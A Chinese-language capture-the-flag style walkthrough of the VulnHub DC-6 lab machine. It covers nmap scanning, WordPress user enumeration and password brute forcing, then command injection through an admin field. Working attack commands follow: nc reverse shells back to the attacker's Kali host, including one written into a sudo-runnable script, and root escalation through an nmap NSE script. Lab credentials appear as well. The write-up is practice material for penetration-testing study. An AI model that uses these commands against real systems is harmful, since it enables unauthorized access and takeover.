準備工作
在vulnhub官網下載DC:6靶機DC: 6 ~ VulnHub
匯入到vmware,設定成NAT模式
開啟kali準備進行滲透(ip:192.168.200.6)
資訊收集
利用nmap進行ip埠探測
nmap -sS 192.168.200.6/24
探測到ip為192.168.200.17的靶機,開放了80埠和22埠
再用nmap對所有埠進行探測,確保沒有別的遺漏資訊
nmap -sV -p- 192.168.200.17
先看看80埠,一直打不開,重定向到了wordy,像DC:2的方法一樣操作,修改host檔案
vi /etc/hosts
和dc:2的介面一模一樣框架也是 WordPress
dirsearch掃描也掃到了/wp-login.php後臺登陸頁面
接下來和dc:2的操作基本一致
wpscan掃描
使用kali自帶的工具wpscan(wordpress框架專門的漏洞掃描工具)列舉出所有使用者
wpscan --url http://wordy/ -e u
爆出五個使用者 admin、jens、graham、mark、sarah,儲存下來待會進行爆破
但是用了很多字典都爆破不出來,不知道怎麼辦的時候才發現在下載地址處的最下面給了線索DC: 6 ~ VulnHub
先cd到/usr/share/wordlists/這個目錄,因為rockyou這個檔案沒有解壓不能直接開啟
gunzip rockyou.txt.gz
再返回桌面執行作者給的命令
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
直接使用wordy進行爆破
wpscan --url http://wordy/ -U user -P passwords.txt
爆到使用者名稱mark 密碼helpdesk01
nc反彈shell
登陸到剛剛的後臺頁面,在這裡找到了命令執行的地方,試了一下127.0.0.1|ls 發現有漏洞可以執行任意命令,那就可以反彈shell到kali上
使用nc反彈shell,但是那個框有字數限制,用bp抓一下再放出去就解決了
nc -e /bin/bash 192.168.200.6 9999
再使用python 通過pty.spawn()獲得互動式shell
python -c'import pty;pty.spawn("/bin/bash")'
root沒有許可權進不去,但是在home裡發現了四個使用者,在mark使用者發現了一個txt檔案,裡面有graham的密碼 GSo7isUM1D4
使用su切換成graham,看看graham的許可權
發現jens下的backups.sh可以不用密碼執行,可以用來獲取jens的許可權
這裡有兩種方法第一種是寫入/bin/bash/,然後以jens的使用者來執行檔案直接獲取許可權
這裡我記錄第二種方法,寫入nc命令,然後在另一端監聽nc -lvf 9999,最後在以jens使用者執行sh檔案,再使用python 通過pty.spawn()獲得互動式shell,兩種方法思路都差不多
echo 'nc 192.168.200.6 9999 -e /bin/bash' > backups.sh
sudo -u jens /home/jens/backups.sh
python -c'import pty;pty.spawn("/bin/bash")'
在看看jens的許可權sudo -l
發現root許可權namp無需密碼,利用這個檔案提權
許可權提升
namp有執行指令碼的功能,那就可以寫一個執行bash的指令碼檔案,通過namp執行來提權
echo 'os.execute("/bin/sh")' > getroot.nse //nes指令碼字尾
sudo nmap --script=/home/jens/getroot.nse //namp執行
DONE
參考文章